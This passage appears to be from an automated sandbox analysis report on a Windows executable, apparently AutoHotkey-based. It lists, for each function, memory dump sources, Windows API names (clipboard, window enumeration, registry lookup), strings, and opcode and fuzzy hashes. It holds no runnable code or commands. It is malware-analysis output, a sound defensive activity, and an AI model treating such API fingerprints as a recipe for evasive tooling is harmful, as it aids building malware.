                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Thread$ChildClassEnumForegroundInfoNameProcessVisibleWindows
                                                                                                                                                                              • String ID: H
                                                                                                                                                                              • API String ID: 1990429777-2852464175
                                                                                                                                                                              • Opcode ID: c4a967081132b180023e5a0c770ab085ab4c36b7aa2dfd919d59f32f66499845
                                                                                                                                                                              • Instruction ID: 25e32a3220e28f1f885f477415264d4c6f2190e6f12a6d53795fec65feba18f5
                                                                                                                                                                              • Opcode Fuzzy Hash: c4a967081132b180023e5a0c770ab085ab4c36b7aa2dfd919d59f32f66499845
                                                                                                                                                                              • Instruction Fuzzy Hash: 45417772208BC085E7229B22A444BCA67A0F799BE4F545316FBA903BF9CF7CC145CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountLocalTickTime
                                                                                                                                                                              • String ID: %03d$MSec$MZ@
                                                                                                                                                                              • API String ID: 173086840-1140963086
                                                                                                                                                                              • Opcode ID: e2222e691f0cb4139e793bbcb0bbb820679d5585bf62cd44848837134d7afc03
                                                                                                                                                                              • Instruction ID: 4d6507f7502828b3695c1198b7aa7410acf8026630a86c69730d5037a04346e9
                                                                                                                                                                              • Opcode Fuzzy Hash: e2222e691f0cb4139e793bbcb0bbb820679d5585bf62cd44848837134d7afc03
                                                                                                                                                                              • Instruction Fuzzy Hash: BD31D472702A9186EB26D726A5403B973A1F79CBE4F464220FF9547BF5DB38C8408354
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Clipboard$AvailableCountFormat$FormatsTick
                                                                                                                                                                              • String ID: MZ@
                                                                                                                                                                              • API String ID: 683467497-2978689999
                                                                                                                                                                              • Opcode ID: 7177ec330ae007f50ada319712f7b17d81b3844464b2fe5e4d9989a441739790
                                                                                                                                                                              • Instruction ID: cb9884ef53b759c48cc579ce2859289a6e01d74ccd71e710bbf32bc8b7fb561e
                                                                                                                                                                              • Opcode Fuzzy Hash: 7177ec330ae007f50ada319712f7b17d81b3844464b2fe5e4d9989a441739790
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E314A76208A8085F7679B26B4947EA3764FB4CBD5F14401BEB89837B5DE38C5868B01
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                              • String ID: InstallDir$SOFTWARE\AutoHotkey
                                                                                                                                                                              • API String ID: 3677997916-1488329376
                                                                                                                                                                              • Opcode ID: b7fc9a68084ac26dbba2d4b62c3734f987b0fbb3ffa0e123af9a6c1ec280565c
                                                                                                                                                                              • Instruction ID: b46a5f334df3de562241437d93812bab387530a1b5bdaa379adca5c7821a9cf7
                                                                                                                                                                              • Opcode Fuzzy Hash: b7fc9a68084ac26dbba2d4b62c3734f987b0fbb3ffa0e123af9a6c1ec280565c
                                                                                                                                                                              • Instruction Fuzzy Hash: C821837271874082EB698B15F49075EB7A1F798BE0F500129FB8983FB8DB78D690CB44
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                              • String ID: IsHungAppWindow$user32
                                                                                                                                                                              • API String ID: 1646373207-934392274
                                                                                                                                                                              • Opcode ID: 460282bcd359a50b6834243c01f798b9204e5372765712d2bff82725c1024d7e
                                                                                                                                                                              • Instruction ID: 7013b20592b556f4ca4d87ed041603b614820b2aa0a731502baab156e12d16fe
                                                                                                                                                                              • Opcode Fuzzy Hash: 460282bcd359a50b6834243c01f798b9204e5372765712d2bff82725c1024d7e
                                                                                                                                                                              • Instruction Fuzzy Hash: CD114CB1311B4182EF16DB66E82179933A0BB8C794F444129AB8E53BB0EF3CC9998701
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AcquireLock$AddressCriticalHandleLeaveModuleProcSection
                                                                                                                                                                              • String ID: ($SetMenuInfo$user32
                                                                                                                                                                              • API String ID: 242699652-1041946166
                                                                                                                                                                              • Opcode ID: ff91a750c1ee5a5505ceec73c1c2fe2d11964e6f602765e4ec0870e97c8f27cc
                                                                                                                                                                              • Instruction ID: c2e264c6a098d8896ed0c7d43359ec6ea6143a294eff6460fb305e6e1ca85277
                                                                                                                                                                              • Opcode Fuzzy Hash: ff91a750c1ee5a5505ceec73c1c2fe2d11964e6f602765e4ec0870e97c8f27cc
                                                                                                                                                                              • Instruction Fuzzy Hash: 45111772205B4186EB61CB2AF99439A73A0F74DB94F404226AB9D93BB5DF3CD495CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DateFormat
                                                                                                                                                                              • String ID: MMM$MMMM$ddd$dddd
                                                                                                                                                                              • API String ID: 2793631785-2187213731
                                                                                                                                                                              • Opcode ID: bca38b2adc25e74bc28bd2bb32bff7a0425e3e0f3123ed476951840947092a77
                                                                                                                                                                              • Instruction ID: e4c5ffcde9e080c5a798627b89fdef35c502dd8aa0d84f2311ee2c67c70f57c4
                                                                                                                                                                              • Opcode Fuzzy Hash: bca38b2adc25e74bc28bd2bb32bff7a0425e3e0f3123ed476951840947092a77
                                                                                                                                                                              • Instruction Fuzzy Hash: 7B11E571608A9083FB168F27E5407AD6361F7497E0F458235F75943AF4DB38CA818708
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: SetWindowTheme$uxtheme
                                                                                                                                                                              • API String ID: 145871493-1369271589
                                                                                                                                                                              • Opcode ID: 898628f0a845768fa5ec0d5347ec4af9ca6c3f5e41736b354577621db4e99c55
                                                                                                                                                                              • Instruction ID: 00abd133513083138add5f7d4fc67f072fa39a0dac3692364da3531d978be57f
                                                                                                                                                                              • Opcode Fuzzy Hash: 898628f0a845768fa5ec0d5347ec4af9ca6c3f5e41736b354577621db4e99c55
                                                                                                                                                                              • Instruction Fuzzy Hash: B4F0F931319B8491EA5AAB57F89439523A0BB5CBD0F485125FE1D93B74DF3CCA45C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                              • String ID: AHK Mouse
                                                                                                                                                                              • API String ID: 2372642624-1022267635
                                                                                                                                                                              • Opcode ID: 5ba0e858e0a64ea442cc1f244bec11736160f08b04bc570a00e694196d1003d1
                                                                                                                                                                              • Instruction ID: 112b8e7dcfeb0d271e8d0ab532654c2af9f396adcde29a99ff9b197de46fe104
                                                                                                                                                                              • Opcode Fuzzy Hash: 5ba0e858e0a64ea442cc1f244bec11736160f08b04bc570a00e694196d1003d1
                                                                                                                                                                              • Instruction Fuzzy Hash: 64F05E71214B44C2FB1ACB23F8643EA22A1BB8CBC4F484425E74647AB0CF7DC4958700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Rect$ClientForegroundMoveParentScreenVisible
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2720414154-0
                                                                                                                                                                              • Opcode ID: 268eec0f9823e20cd8a7d6d1435563bbc8b47eae1ec502d38de2b594efdbea1e
                                                                                                                                                                              • Instruction ID: c2ac69cb3d505dc10e94306d0aabd8436b7fa990e38f3fba2258cc568f121f5f
                                                                                                                                                                              • Opcode Fuzzy Hash: 268eec0f9823e20cd8a7d6d1435563bbc8b47eae1ec502d38de2b594efdbea1e
                                                                                                                                                                              • Instruction Fuzzy Hash: 41716732A002808AFB16DF6794847EE27A0B74DBD8F144615FF1A57BE5DB38C981CB10
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CursorMetricsSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3091566494-0
                                                                                                                                                                              • Opcode ID: 8018263ac9781f4bcd704af851d3a09354d684827c0099ba387d3ed5c089359c
                                                                                                                                                                              • Instruction ID: 8a4d251bf4e3a752c2b5a307d69f5b753c0c720296eb79ccb08563c88dc78100
                                                                                                                                                                              • Opcode Fuzzy Hash: 8018263ac9781f4bcd704af851d3a09354d684827c0099ba387d3ed5c089359c
                                                                                                                                                                              • Instruction Fuzzy Hash: CB51A0763143508BF766DF1BE940B9A77A1B758BD0F004018FB8687AA5DB3AC864CF14
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: & $ Up$MZ@
                                                                                                                                                                              • API String ID: 0-1529032960
                                                                                                                                                                              • Opcode ID: 1934011b4b23b1200ec3272813d79903a39b74b4b060d35836f3bdb9306172d6
                                                                                                                                                                              • Instruction ID: bda84450eea8ca4dcae6f63a636e50031d7266b069c70ccdde2289fddd6b4572
                                                                                                                                                                              • Opcode Fuzzy Hash: 1934011b4b23b1200ec3272813d79903a39b74b4b060d35836f3bdb9306172d6
                                                                                                                                                                              • Instruction Fuzzy Hash: 385171B271468090EB66EB17A5003F977A1FB49BD4F899123FB49437A6EB38C581C721
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: wcsstr
                                                                                                                                                                              • String ID: & $ Up$MZ@$~
                                                                                                                                                                              • API String ID: 2735924446-1448277115
                                                                                                                                                                              • Opcode ID: e9d06d722ee367b61729b08ff2993cc648a734f6bf8f620eda0c869adbcc9430
                                                                                                                                                                              • Instruction ID: 2ea1114f3ac32c86956c4109d75de619b177ea18be3e457aa2dd5d6abf53c109
                                                                                                                                                                              • Opcode Fuzzy Hash: e9d06d722ee367b61729b08ff2993cc648a734f6bf8f620eda0c869adbcc9430
                                                                                                                                                                              • Instruction Fuzzy Hash: 3C51B2B6604A9085EB72D716B5003FAB7A0E7597C8F844012FF89036E9EB3DC596D721
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ChildEnumWindows
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3555792229-0
                                                                                                                                                                              • Opcode ID: 363f0ae7ba92efeec05a6b86f03369ce6a9deecbd3a311e5c22a7c5b83738dbc
                                                                                                                                                                              • Instruction ID: d2356cf2d0d641026e42e2ab5bc4170a3ea07417e983324584026f9ad2366e6b
                                                                                                                                                                              • Opcode Fuzzy Hash: 363f0ae7ba92efeec05a6b86f03369ce6a9deecbd3a311e5c22a7c5b83738dbc
                                                                                                                                                                              • Instruction Fuzzy Hash: 14415132619BC081DB369B56F5443EAB3B5F789BD0F484215EB9903BA9DF3CC2948B44
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: State$ThreadWindow$CurrentForegroundProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3707567570-0
                                                                                                                                                                              • Opcode ID: 9a5abd760bd55209046415a94fbf893eccb84c62043289f53f984c6064b45e2b
                                                                                                                                                                              • Instruction ID: e296d1848d5161a97bbb0f7cd494ef8d80825c96ede701df8d492e65f9279c67
                                                                                                                                                                              • Opcode Fuzzy Hash: 9a5abd760bd55209046415a94fbf893eccb84c62043289f53f984c6064b45e2b
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A31C9326086608AE376AB26A8967EE7760F7887D4F544218FBC107AB5CF7E8444DB11
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                              • Opcode ID: 82135ee0c62596e6123306dea27970951e95f4e3f3cada795f5fa633b0f24fe8
                                                                                                                                                                              • Instruction ID: 209d0bc88f045c164df83ff2f1421387915b26f5a0bceecbac65f7b7d6c84a62
                                                                                                                                                                              • Opcode Fuzzy Hash: 82135ee0c62596e6123306dea27970951e95f4e3f3cada795f5fa633b0f24fe8
                                                                                                                                                                              • Instruction Fuzzy Hash: D011C636698E050BF66619EBE4523E51171AB9D3F0F144224FB76076F6CEF88A414624
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
